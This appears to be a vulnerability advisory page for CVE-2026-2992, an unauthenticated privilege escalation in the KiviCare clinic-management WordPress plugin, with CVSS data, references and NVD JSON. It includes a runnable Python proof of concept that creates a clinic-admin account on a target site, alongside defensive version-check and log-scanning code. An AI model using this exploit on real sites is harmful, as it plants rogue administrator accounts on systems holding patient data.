Security Vulnerability Report
CVE-2026-2992 CVSS 8.2 HIGH

Published: 2026-03-18 16:16:28
Last Modified: 2026-04-22 21:32:08

Description

The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization on the `/wp-json/kivicare/v1/setup-wizard/clinic` REST API endpoint in all versions up to, and including, 4.1.2. This makes it possible for unauthenticated attackers to create a new clinic and a WordPress user with clinic admin privileges.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No CPE configuration data is present in the NVD record (vulnStatus "Deferred"), so the affected range below is taken from the CVE description and the referenced Wordfence advisory rather than from NVD configuration matching:

KiviCare – Clinic & Patient Management System (EHR) <= 4.1.2 (WordPress plugin slug kivicare-clinic-management-system, as in the referenced trac URLs)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-2992 PoC - KiviCare Privilege Escalation
# Target: WordPress site with KiviCare plugin <= 4.1.2
# The route has no permission check (CWE-862), so the request is sent with no
# WordPress session cookie and no REST nonce at all.
TARGET_URL = "http://target-wordpress-site.com"
API_ENDPOINT = "/wp-json/kivicare/v1/setup-wizard/clinic"

# Payload to create a clinic and a clinic-admin user.
# The field names are those given in this PoC and have not been verified
# against SetupWizardController.php; check the plugin source before relying
# on them. E-mail addresses are placeholders (the originals were obfuscated
# when the page was extracted).
payload = {
    "clinic_name": "Malicious Clinic",
    "clinic_email": "clinic@example.com",
    "clinic_phone": "1234567890",
    "clinic_address": "Attacker's Address",
    "user_email": "attacker@example.com",
    "user_password": "P@ssw0rd123!",
    "user_role": "clinic_admin",
}


def exploit():
    url = TARGET_URL + API_ENDPOINT
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    }
    print(f"[*] Exploiting CVE-2026-2992 on {TARGET_URL}")
    print(f"[*] Target endpoint: {url}")
    try:
        response = requests.post(url, json=payload, headers=headers, timeout=30)
        if response.status_code in (200, 201):
            print("[+] Success! Clinic and admin user created.")
            print(f"[+] Response: {response.text}")
            print(f"[*] Login with: {payload['user_email']} / {payload['user_password']}")
        else:
            # A 401/403 means a permission callback rejected the unauthenticated
            # request (patched or otherwise hardened); a 404 means the route is
            # not registered on this site.
            print(f"[-] Failed with status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    exploit()
```
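The PoC above shows the attacker side. The following is an added example for the defender side, written for this page and not taken from the plugin, Wordfence, or the original report. It does two things a responder needs once this advisory lands: decide from a version string whether an install is inside the "up to and including 4.1.2" range (numeric tuple comparison, so 4.1.10 is correctly treated as newer than 4.1.2), and sweep web-server access logs for POSTs to the setup-wizard endpoint, covering both the pretty-permalink form (`/wp-json/...`) and the `index.php?rest_route=...` form WordPress uses when pretty permalinks are off. Each hit records whether the server accepted the request (2xx) and whether the same source IP later POSTed to `wp-login.php`, which is what an attacker logging in with the clinic-admin account they just created would look like. The log lines are constructed for the example and the Combined Log Format layout is an assumption about the reader's web server.

```python
"""Triage helpers for CVE-2026-2992 (added example; not the plugin's or the page's code)."""
import re
from collections import defaultdict
from urllib.parse import unquote

VULN_ENDPOINT = "/wp-json/kivicare/v1/setup-wizard/clinic"
LAST_AFFECTED = "4.1.2"   # advisory: "all versions up to, and including, 4.1.2"

# Combined Log Format (assumed): ip - user [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_version(v):
    """'4.1.2' -> (4, 1, 2). Keeps the numeric prefix of each piece, so
    '4.1.2-beta' -> (4, 1, 2)."""
    parts = []
    for piece in v.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_affected_version(version):
    """True when the installed version is <= 4.1.2. Tuple comparison, not string
    comparison: '4.1.10' sorts after '4.1.2' numerically but before it as text."""
    return parse_version(version) <= parse_version(LAST_AFFECTED)


def normalize_rest_path(raw):
    """Map both REST URL forms onto the pretty form so one comparison covers both:
    /wp-json/kivicare/v1/...  and  /index.php?rest_route=/kivicare/v1/... (URL-encoded or not)."""
    path, _, query = raw.partition("?")
    for kv in query.split("&") if query else []:
        key, _, value = kv.partition("=")
        if key == "rest_route":
            return "/wp-json" + unquote(value)
    return path


def scan_access_log(lines):
    """One finding per POST to the vulnerable endpoint, with the response status,
    whether it was accepted (2xx), and whether the same IP later POSTed to wp-login.php."""
    events = defaultdict(list)  # ip -> [(lineno, method, normalized_path, status)]
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        events[m.group("ip")].append(
            (lineno, m.group("method"), normalize_rest_path(m.group("path")), int(m.group("status")))
        )

    findings = []
    for ip, evs in events.items():
        for idx, (lineno, method, path, status) in enumerate(evs):
            if method != "POST" or path != VULN_ENDPOINT:
                continue
            later_login = any(
                mth == "POST" and p.endswith("/wp-login.php") for (_, mth, p, _) in evs[idx + 1:]
            )
            findings.append({
                "ip": ip,
                "line": lineno,
                "status": status,
                "accepted": 200 <= status < 300,   # on a patched site expect 401/403 here
                "followed_by_login": later_login,
            })
    return findings


# Constructed sample log (not from a real site): one successful hit followed by a
# login, one attempt rejected with 401 via the rest_route form, and a harmless GET.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Mar/2026:10:01:02 +0000] "POST /wp-json/kivicare/v1/setup-wizard/clinic HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Mar/2026:10:01:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [18/Mar/2026:11:00:00 +0000] "POST /index.php?rest_route=%2Fkivicare%2Fv1%2Fsetup-wizard%2Fclinic HTTP/1.1" 401 97 "-" "curl/8.0"',
    '192.0.2.5 - - [18/Mar/2026:11:05:00 +0000] "GET /wp-json/kivicare/v1/setup-wizard/clinic HTTP/1.1" 404 55 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for v in ("4.1.2", "4.1.10", "4.2.0"):
        print(f"{v}: {'AFFECTED' if is_affected_version(v) else 'not affected'}")
    for f in scan_access_log(SAMPLE_LOG):
        print(f)
```

A 2xx with `followed_by_login` set is the case to escalate: list WordPress users and KiviCare clinics created around that timestamp and remove any the organisation did not provision. A 401/403 hit is still worth noting as scanning activity, but it shows the permission check was in place for that request.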

References

- https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/SetupWizardController.php#L31 (plugin source, SetupWizardController.php)
- https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/SetupWizardController.php#L162 (plugin source, SetupWizardController.php)
- https://plugins.trac.wordpress.org/changeset/3467409/ (plugin changeset)
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d96743ea-08b1-4b4c-9d62-558b97a6e297?source=cve (Wordfence advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-2992",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T16:16:27.583",
    "lastModified": "2026-04-22T21:32:08.360",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization on the `/wp-json/kivicare/v1/setup-wizard/clinic` REST API endpoint in all versions up to, and including, 4.1.2. This makes it possible for unauthenticated attackers to create a new clinic and a WordPress user with clinic admin privileges."
      },
      {
        "lang": "es",
        "value": "El plugin KiviCare – Clinic &amp; Patient Management System (EHR) para WordPress es vulnerable a la escalada de privilegios debido a la falta de autorización en el endpoint de la API REST `/wp-json/kivicare/v1/setup-wizard/clinic` en todas las versiones hasta la 4.1.2, inclusive. Esto permite a atacantes no autenticados crear una nueva clínica y un usuario de WordPress con privilegios de administrador de clínica."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/SetupWizardController.php#L162",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/SetupWizardController.php#L31",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3467409/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d96743ea-08b1-4b4c-9d62-558b97a6e297?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```